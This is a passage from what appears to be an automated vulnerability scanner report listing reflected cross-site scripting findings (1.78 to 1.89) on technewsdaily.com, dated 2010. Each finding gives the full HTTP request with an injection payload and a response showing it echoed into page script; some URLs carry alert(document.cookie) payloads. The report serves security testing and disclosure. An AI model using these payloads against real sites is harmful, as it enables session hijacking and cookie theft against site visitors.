<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/?6f3e0"><a>be6b7a008ac=1/" />
...[SNIP]...

1.78. http://www.technewsdaily.com/how-to-protect-your-laptop-in-public-places-1542/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-protect-your-laptop-in-public-places-1542/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c21d2'-alert(1)-'dd14ef7e79f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-protect-your-laptop-in-public-places-1542c21d2'-alert(1)-'dd14ef7e79f/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40494

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-protect-your-laptop-in-public-places-1542c21d2'-alert(1)-'dd14ef7e79f/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.79. http://www.technewsdaily.com/how-to-protect-your-laptop-in-public-places-1542/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-protect-your-laptop-in-public-places-1542/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b6e6'-alert(1)-'4813f8d6b02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-protect-your-laptop-in-public-places-1542/?1b6e6'-alert(1)-'4813f8d6b02=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66492

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
pe="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-protect-your-laptop-in-public-places-1542/?1b6e6'-alert(1)-'4813f8d6b02=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.80. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-secure-privacy-on-facebook-0596/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1fd9'-alert(1)-'eed141cc16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(1)-'eed141cc16/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 01:21:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=vhhlf6ta06dh844q4tbjq58lu6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 01:21:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(1)-'eed141cc16/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.81. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /how-to-secure-privacy-on-facebook-0596/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed8c"><a>b9005069e68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /how-to-secure-privacy-on-facebook-0596/?6ed8c"><a>b9005069e68=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 01:21:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=0kgldq7s1maslg6itnbn60b0k3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 01:21:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/?6ed8c"><a>b9005069e68=1/" />
...[SNIP]...

1.82. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-secure-privacy-on-facebook-0596/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31981'-alert(1)-'c34025ad3cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-secure-privacy-on-facebook-0596/?31981'-alert(1)-'c34025ad3cd=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 01:21:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=vtmbdes76tb9oqrq3minn7nti3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 01:21:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65868

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/?31981'-alert(1)-'c34025ad3cd=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.83. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 452ca'-alert(1)-'e1700deaaf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16452ca'-alert(1)-'e1700deaaf1/ HTTP/1.1
Host: www.technewsdaily.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-391693423-1292640388971; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; __utmb=246794907.1.10.1292640389; a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:51:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:51:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40564

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
Timeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16452ca'-alert(1)-'e1700deaaf1/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.84. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e001'-alert(1)-'bf03e2ce157 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/?3e001'-alert(1)-'bf03e2ce157=1 HTTP/1.1
Host: www.technewsdaily.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-391693423-1292640388971; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; __utmb=246794907.1.10.1292640389; a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:50:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:50:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40574

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
meout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/?3e001'-alert(1)-'bf03e2ce157=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.85. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98fe7'-alert(1)-'36170a62c45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc1698fe7'-alert(1)-'36170a62c45/index.php HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40582

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
Timeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc1698fe7'-alert(1)-'36170a62c45/index.php",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.86. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a4dd'-alert(1)-'6f6ba9b182b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/6a4dd'-alert(1)-'6f6ba9b182b HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40564

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
imeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/6a4dd'-alert(1)-'6f6ba9b182b",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.87. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20de5'-alert(1)-'841408d821b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php?20de5'-alert(1)-'841408d821b=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:51:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:51:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40592

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
MSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php?20de5'-alert(1)-'841408d821b=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.88. http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-take-good-pictures-with-your-cell-phone-100128-0111/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3533'-alert(1)-'33d994a3a1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-take-good-pictures-with-your-cell-phone-100128-0111a3533'-alert(1)-'33d994a3a1e/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40514

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111a3533'-alert(1)-'33d994a3a1e/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.89. http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /how-to-take-good-pictures-with-your-cell-phone-100128-0111/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79067"><a>0a6ebaddcd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /how-to-take-good-pictures-with-your-cell-phone-100128-0111/?79067"><a>0a6ebaddcd6=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
